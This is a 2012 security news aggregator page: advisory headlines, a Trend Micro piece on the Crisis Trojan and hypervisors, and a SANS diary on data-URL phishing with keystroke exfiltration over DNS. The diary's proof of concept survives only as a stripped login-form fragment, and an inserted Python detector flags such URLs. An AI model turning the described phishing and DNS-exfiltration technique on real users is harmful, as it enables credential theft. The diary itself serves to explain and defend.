InfoSec News

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
A California judge's order that Oracle must keep porting its software to Hewlett-Packard's Itanium platform is now final, setting the stage for a jury trial over whether Oracle breached a contract with HP and what damages it may need to pay.
Elxis CMS Multiple Cross Site Scripting Vulnerabilities
The U.S. Republican Party has approved a policy statement that focuses on removing regulations and protects personal data on the Internet.
Basic Java sandboxing has been around since 1995, but flaws in the Java virtual machine are highly targeted. Experts are calling on Oracle to do more.

[SECURITY] [DSA 2535-1] rtfm security update
Salesforce.com has revealed details of what's coming in its next major product update, Winter '13, in a set of release notes recently posted on its website.
Oracle knew since April about the existence of the two unpatched Java 7 vulnerabilities that are currently being exploited in malware attacks, according to Adam Gowdiak, the founder and CEO of Polish security firm Security Explorations.
Re: [SE-2012-01] information regarding recently discovered Java 7 attack
Motorola Mobility and Verizon Wireless have scheduled a press conference for Sept. 5 in New York City, reportedly to unveil a new Droid Razr M smartphone.
Samsung announced an ambitious line of Windows 8 mobile devices using the Ativ name on Wednesday, including an ATIV S smartphone with a 4.8-in. HD display and three tablet PCs.
Stardock today released a beta version of its "Start8" utility that restores a Start button to the desktop of Windows 8.
Sistem Biwes Multiple Vulnerability
[ MDVSA-2012:147 ] mozilla-thunderbird
GE Proficy Historian 'KeyHelp.ocx' ActiveX Control Remote Code Execution Vulnerability
Seeker Adv MS-06 - .Net Cross Site Scripting - Request Validation Bypassing
Re: [Full-disclosure] [SE-2012-01] information regarding recently discovered Java 7 attack
If Apple uses a new, thinner display in its next iPhone, the battery could pack as much as 40% more capacity than the current 4S, said Shawn Lee, a research director at DisplaySearch.
ZDI-12-177 : (0Day) HP SiteScope SOAP Call loadFileContent Remote Code Execution Vulnerability
EMC ApplicationXtender Multiple Products Arbitrary File Upload Vulnerability
ZDI-12-181 : Novell iPrint nipplib.dll client-file-name Parsing Remote Code Execution Vulnerability
ZDI-12-178 : (0Day) HP SiteScope SOAP Call update Remote Code Execution Vulnerability
The legal battle between Apple and Samsung Electronics may continue for another year or more despite a jury verdict on Friday that appeared to hand the iPhone maker a solid win. But the wrangling isn't likely to delay Apple's next big product.
As is somewhat typical of emerging technologies, there isn't a universally agreed to definition of what is meant by software defined networking (SDN). Over the last year or two most of the definitions have focused on the decoupling of the network control plane from the network forwarding plane.
Mozilla has detailed the security vulnerabilities it has fixed with the recent release of version 15 of Firefox and Thunderbird. The closed holes include seven Critical vulnerabilities in Firefox, five of which affect Thunderbird as well.

ZDI-12-176 : (0Day) HP SiteScope SOAP Call getFileInternal Remote Code Execution Vulnerability
ZDI-12-172 : (0Day) HP Operations Orchestration RSScheduler Service JDBC Connector Remote Code Execution Vulnerability
Sony Mobile today announced three new smartphones and a 9.4-in. Android 4.0 tablet at the IFA show in Berlin.
The U.S. Air Force is openly soliciting technologies that would improve its capability of launching cyberattacks and gathering intelligence during cyberwarfare operations.
Attackers using two recently-uncovered Java unpatched vulnerabilities, or 'zero-days,' have quickly expanded their reach by going mainstream, security experts said today.
Recent updates to the Apache OpenOffice and LibreOffice productivity suites close multiple heap-based buffer overflow vulnerabilities that could be exploited by a remote attacker to execute malicious code.

With the current highly critical Java 0day vulnerability, The H has disabled its Update Check service so as not to encourage readers to install Java.

ZDI-12-179 : EMC ApplicationXtender Desktop Viewer AEXView ActiveX AnnoSave Remote Code Execution Vulnerability
ZDI-12-173 : (0Day) HP SiteScope SOAP Call getSiteScopeConfiguration Remote Code Execution Vulnerability
ZDI-12-171 : (0Day) Hewlett-Packard Intelligent Management Center UAM sprintf Remote Code Execution Vulnerability
ZDI-12-168 : InduSoft Thin Client ISSymbol InternationalSeparator Remote Code Execution Vulnerability
A federal judge rejected the efforts of BancorpSouth to use contractual agreements with customers as a shield against liability claims stemming from an online heist of some $440,000 that was illegally wire-transferred from the account of one of the bank's commercial customers in March 2010.
Ready or not, it is time for corporate legal and MIS departments to accept the fact that real and unique corporate Electronically Stored Information (ESI) resides on mobile devices such as iPhones, Blackberrys and tablets. Until recently, most lawyers exempted these devices from preservation and collection obligations with a wide variety of arguments; too difficult, redundant content, inaccessible, lack of explicit caselaw and bipartisan agreements. The rise of the mobile workforce, integrated communications, mobile apps and more have combined to make smart phones and tablets critical sources of unique ESI for corporate executives and other critical personnel. If we accept that mobile devices must be preserved and collected for civil discovery, then we get to the hard question of how to do it.
Sony will launch a flat-panel television around the world later this year that has more than four times the number of pixels than today's high-definition TVs.
A judge has allowed privacy group Consumer Watchdog to move forward with an effort to oppose a $22.5 million privacy settlement between Google and the U.S. Federal Trade Commission.
t2'12: Challenge to be released 2012-09-01 10:00 EEST
[ MDVSA-2012:146 ] firefox
XSS in PrestaShop
Cross-Site Scripting (XSS) in Phorum
Google has started publicly testing an initial set of enterprise social networking (ESN) features for Google+, adding a key collaboration component for Google Apps customers.
The 0Day for Java affects Java 7 on all platforms in all browsers. Users should disable Java applets to protect themselves, as the exploit is out in the wild and no patch is currently available.

A second alleged hacker has been arrested in connection with an attack on Sony Pictures by LulzSec in June 2011, in which the hacktivist group claimed to have obtained more than one million data records.

ToorCon 14 Call For Papers
TomTom plans to launch a navigation app for Android smartphones in October, the company said Wednesday at the IFA trade show in Berlin.

Last week, when Symantec researchers said they had discovered the Windows version of the Crisis Trojan could spread to VMware virtual machines, it was big news. But Trend Micro doesn’t see Crisis as a major threat for enterprises using VMware. In fact, executives at the company think Crisis’s potential to spread to virtual machines was overblown.

“There was a fair amount of hype,” Harish Agastya, director of product marketing for data center security at Trend Micro, told me in a meeting this week at VMworld in San Francisco.

The Crisis malware only impacts Windows-based Type 2 hypervisor deployments, not Type 1 hypervisor deployments, which are what most enterprises use, he said. “It’s specific to Type 2,” he said.

Warren Wu, director of product group management in the data center business unit, wrote a blog post that provided more details on the different deployments and attack scenarios. Here’s his description:

Type 1 Hypervisor deployment – Prime examples are VMware ESX, Citrix Xensource etc. It would help to think of these products as replacing the Host OS (Windows/Linux) and executing right on the actual machine hardware. This software is like an operating system and directly controls the hardware. In turn, the hypervisor allows multiple virtual machines to execute simultaneously. Almost all data center deployments use this kind of virtualization. This is NOT the deployment this malware attacks. I’m not aware of malware capable of infecting Type 1 Hypervisors in the wild.

Type 2 Hypervisor deployment – Example VMware Workstation, VMware Player etc. In this case the hypervisor installs on TOP of a standard operating system (Windows/Linux) and in turn hosts multiple virtual machines on top. It is this second scenario that the malware infects. First, the host operating system is compromised. This could be a well-known Windows/Mac OS attack (with the only added wrinkle being the OS is detected and the appropriate executable is installed). It then looks for VMDK files and probably instantiates the VM (using VmPlayer) and then uses the same infection as that used for the Host OS. This type of an infection can be stopped with up-to-date, endpoint antimalware solutions.

What makes Crisis unique, Wu wrote, is that it specifically seeks out virtual machines and tries to infect them. It also infects the VM through the underlying infrastructure by modifying the VMDK file instead of infecting the VM through more conventional avenues such as file shares, he said.

Trend Micro has made a name for itself in virtualization security, so what the company is saying about Crisis carries a lot of weight. Trend Micro was the first security vendor to partner with VMware and produce an agentless antivirus product. At VMWorld, the company launched the latest version of its Deep Security server security platform, which provides anti-malware and firewall protection, intrusion prevention and integrity monitoring to protect virtual servers and desktops.

The new version features caching and de-duplication functions to reduce file scanning and improve performance and hypervisor integrity monitoring. Deep Security 9 also includes integration with VMware’s vCloud Director and Amazon Web Services. That integration combined with a unified management console will enable customers to manage security of their physical, virtual and cloud servers from a single console, Agastya said.

Trend also launched Trend Ready for Cloud Service Providers, a program that provides certification that Trend Micro’s cloud security products – Deep Security and Secure Cloud– are compatible within a service provider’s environment, said Scott Montgomery, global strategic director of cloud provider business development at Trend. AWS, Dell, HP Cloud Services and Savvis are among the cloud service providers that have received the Trend Ready designation.

RETIRED: Novell ZENWorks 'LaunchHelp.dll' ActiveX Control Remote Code Execution Vulnerability
The use of data URLs in cross-site scripting and other attacks isn't exactly new. But the concept is still not widely known, and keeps getting rediscovered. The latest iteration is a paper outlining the use of data URLs in serverless phishing [1] (thanks to our reader Tor for pointing out this paper).
Data URLs are defined in RFC 2397 (published in 1998, ancient internet history) and implemented in all browsers I am aware of. I remember using them back in the old days to embed images in some of my early CGI scripts, before I figured out better ways to do this.
The syntax is pretty simple: data:[<mediatype>][;base64],<data>
The trick is that the data URL doesn't point to a remote document like a traditional URL; instead it includes all the data needed to display the page. Here are two examples: a small image, and a simple HTML page. You can create your own data URLs easily at the Data URI Kitchen [1].
You can probably see how it wouldn't be too hard to come up with a halfway convincing phishing page. The problem is that there are few defenses against this type of phishing: the web browser will not connect to any external resource to display the phish, unless images are included from remote sites (they could also be embedded). The only limit is whatever size limit the browser imposes on URLs.
From a phishing perspective, this will allow inserting the form, but you will still need a web server to receive the data. Unless, of course, you can exfiltrate it via DNS. Here is a little proof-of-concept HTML / JavaScript to accomplish this. The image loaded here doesn't actually exist; the only thing we are interested in is the DNS request sending the username and password as they are typed:
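Added example (not the diary's code): a parser for the RFC 2397 format described above, plus a classifier that flags data URLs carrying a whole HTML document with a login form, the kind of link a mail or proxy filter would want to catch. The sample URL is constructed; example.invalid is a placeholder domain.

```python
"""RFC 2397 data URL parser plus a classifier for the serverless-phishing
pattern (a complete HTML login form inside the URL). Added example, not
code from the ISC diary. Syntax: data:[<mediatype>][;base64],<data>"""
import base64
import re
from urllib.parse import unquote_to_bytes

# Everything between "data:" and the first comma is the media type block;
# a media type cannot contain a comma, so splitting there is safe.
DATA_URL_RE = re.compile(r"^data:(?P<meta>[^,]*),(?P<data>.*)$", re.DOTALL | re.IGNORECASE)


def parse_data_url(url: str) -> dict:
    """Return media type, parameters, base64 flag and the decoded body bytes."""
    m = DATA_URL_RE.match(url.strip())
    if not m:
        raise ValueError("not a data URL")
    parts = [p.strip() for p in m.group("meta").split(";")]
    is_base64 = parts[-1].lower() == "base64"
    if is_base64:
        parts = parts[:-1]
    explicit_type = bool(parts and parts[0])
    mediatype = parts[0].lower() if explicit_type else "text/plain"
    params = {}
    for p in parts[1:]:
        if "=" in p:
            key, value = p.split("=", 1)
            params[key.lower()] = value
    if not explicit_type:
        params.setdefault("charset", "US-ASCII")  # RFC 2397 default media type
    raw = m.group("data")
    if is_base64:
        raw = re.sub(r"\s+", "", raw)
        raw += "=" * (-len(raw) % 4)  # browsers tolerate missing padding
        body = base64.b64decode(raw)
    else:
        body = unquote_to_bytes(raw)  # percent-decoding for the non-base64 form
    return {"mediatype": mediatype, "params": params, "base64": is_base64, "body": body}


def classify_data_url(url: str) -> str:
    """'html-form' for an HTML document with a form or password field,
    'html' for any other HTML document, 'other' for everything else."""
    info = parse_data_url(url)
    if info["mediatype"] not in ("text/html", "application/xhtml+xml"):
        return "other"
    body = info["body"].lower().replace(b'"', b"").replace(b"'", b"")
    if b"<form" in body or b"type=password" in body:
        return "html-form"
    return "html"


# Constructed sample: a tiny login form, base64-wrapped as a phishing link would carry it.
SAMPLE_HTML = (b"<html><body><form action='https://example.invalid/login'>"
               b"<input type='password' name='pass'></form></body></html>")
SAMPLE_URL = "data:text/html;base64," + base64.b64encode(SAMPLE_HTML).decode("ascii")
```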

form action=http://phishmebank.com
Username: input type=text name=user onkeydown=
Password: input type=password name=pass onkeydown=
Did I mention that you should REALLY watch your DNS and HTTP proxy logs? (This would not show up in your proxy logs if the DNS query returns NXDOMAIN.)


Johannes B. Ullrich, Ph.D.

SANS Technology Institute

The market for these systems is getting crowded, but the only way to attract customers to them is to make them inherently safe.
In an effort to improve how MongoDB supplies its data to external applications, MongoDB keeper 10gen has extended the open source data store's query language, providing developers with more sophisticated ways to extract and transform data.
If you want to blog, or manage a blog, from your iPad, you could use your blog platform's web page editor. But it's unlikely that interface has been optimized for the iPad's screen. Enter Posts, a $10 iPad app from Pico that lets you create, edit and view posts on blogs using Blogger or WordPress. (For the latter, it works with blogs hosted on wordpress.com as well as self-hosted WordPress blogs.)
op5 Monitor HTML Injection and SQL Injection Vulnerabilities
New containerization technologies can help BYOD initiatives succeed by creating separate spaces on smartphones for work and personal use.
New Zealand's High Court ruled on Wednesday that Megaupload can take out a $4.8 million loan to pay its legal bills and rent for founder Kim Dotcom.
The Japanese government on Wednesday hosted a panel in Tokyo on allowing emergency '911' calls to be placed through social networks such as Twitter during natural disasters.
IBM and Hewlett-Packard tied for the top position in server factory revenue in the second quarter, with a 29.2% and 29.6% share respectively, IDC said on Tuesday.
A 20-year-old man surrendered to FBI agents on Tuesday for his alleged hacking of Sony Pictures, one of a wave of attacks executed last year by the hacking collective LulzSec.
Integration between Zend Server PHP and VMware vFabric Application Director automates the process of moving from virtualized to cloud environments.
Mono ASP.NET Web Form Hash Collision Denial Of Service Vulnerability
In the seven years since Katrina struck New Orleans, advances in computer power and storm surge modeling are giving the city detailed data about Hurricane Isaac's impact.
Columnist John Webster says big data promises a style of computing that more closely mimics the functioning of the human mind. For IT, that means moving from provisioning of services to making a big impact on business results.
The latest version of Mozilla's open source email client allows users to instant message their contacts in real time, adds support for the Do Not Track header and implements a new user interface based on Firefox's upcoming Australis theme.

A programming flaw renders Java's entire elaborate security model ineffective because the exploit simply disables the security components.

MIPS Technologies hopes to challenge ARM in the market for high-end tablets and smartphones with an upcoming processor design it presented at the HotChips conference in Silicon Valley on Tuesday.
A court in California has scheduled a hearing for Dec. 6 on Apple's request for a permanent injunction against eight Samsung phones, according to court papers filed Tuesday. Meanwhile, the court will hear next month Samsung's plea to vacate an earlier preliminary injunction against its Galaxy Tab 10.1.
Oracle Outside In Technology CVE-2012-1768 Remote Code Execution Vulnerability

Posted by InfoSec News on Aug 28


By Brian Donohue
Threat Post
August 28, 2012

The Air Force Life Cycle Management Center (AFLCMC) posted a broad
agency announcement [PDF] recently, calling on contractors to submit
concept papers detailing technological demonstrations of ‘cyberspace
warfare operations’ (CWO) capabilities.

The Air Force is looking to obtain CWO capabilities falling into a...

Posted by InfoSec News on Aug 28


By Andy Greenberg

When lock maker Onity first responded last month to news that a hacker’s
exploit could open millions of its keycard locks installed on hotel room
doors around the world, it downplayed the attack on its hardware as
“unreliable, and complex to...

Posted by InfoSec News on Aug 28


By Sean Gallagher
Ars Technica
Aug 28 2012

When Libyan rebels finally wrested control of the country last year away
from its mercurial dictator, they discovered the Qaddafi regime had
received an unusual gift from its allies: foreign firms had supplied
technology that allowed security forces to track nearly all of the...

Posted by InfoSec News on Aug 28


By Elinor Mills
Security & Privacy
August 28, 2012

A group of hackers has released a vast quantity of data from banks,
government agencies, consulting firms and many others and promised more
data leaks in the future.

"Team GhostShell's final form of protest this summer against the banks,
politicians and for all the fallen...

Posted by InfoSec News on Aug 28


Project On Government Oversight
Aug 28, 2012

After an embarrassing breach of security at the Y-12 National Security
Complex in July, the Project On Government Oversight has learned that
the Department of Energy’s Office of Independent Oversight Program (IO)
will conduct a full review of security at Y-12 before the end of this